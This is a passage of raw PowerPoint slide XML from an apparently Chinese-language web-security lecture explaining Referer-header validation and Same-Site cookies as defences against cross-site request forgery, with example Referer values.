          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标题字段，用于标识生成请求的网页地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器可以检查请求是否源自它自己的页面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>问题：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>该字段显示了一部分浏览历史记录，这会引起隐私问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>intranet.corp.apple.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/projects/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>iphone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>competitors.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2251682"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2050"/>
              <a:ext cx="2880" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2078"/>
              <a:ext cx="2986" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referrer: http://www.facebook.com/home.php</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="902941" y="2119335"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176046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1">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9090" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>Referrer Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="8001000" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Referrer: http://www.facebook.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Referrer: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Referrer: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宽松的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字段丢失，则不起作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>严格的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>足够安全，但是有时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字段缺失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7682028" y="1858963"/>
            <a:ext cx="554037" cy="655637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ECD882"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7682028" y="2286000"/>
            <a:ext cx="482600" cy="655638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7778865" y="2811463"/>
            <a:ext cx="439738" cy="769937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1244323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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>对策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: Same-Site Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1524000"/>
            <a:ext cx="8520600" cy="3772784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>浏览器（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）中的一种特殊类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，它们为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提供了一项特殊属性，称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>该属性由服务器设置，它告诉浏览器一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是否应该附加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>具有此属性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>始终与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same-site requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一起发送，但它们是否与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一起发送取决于此属性的值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
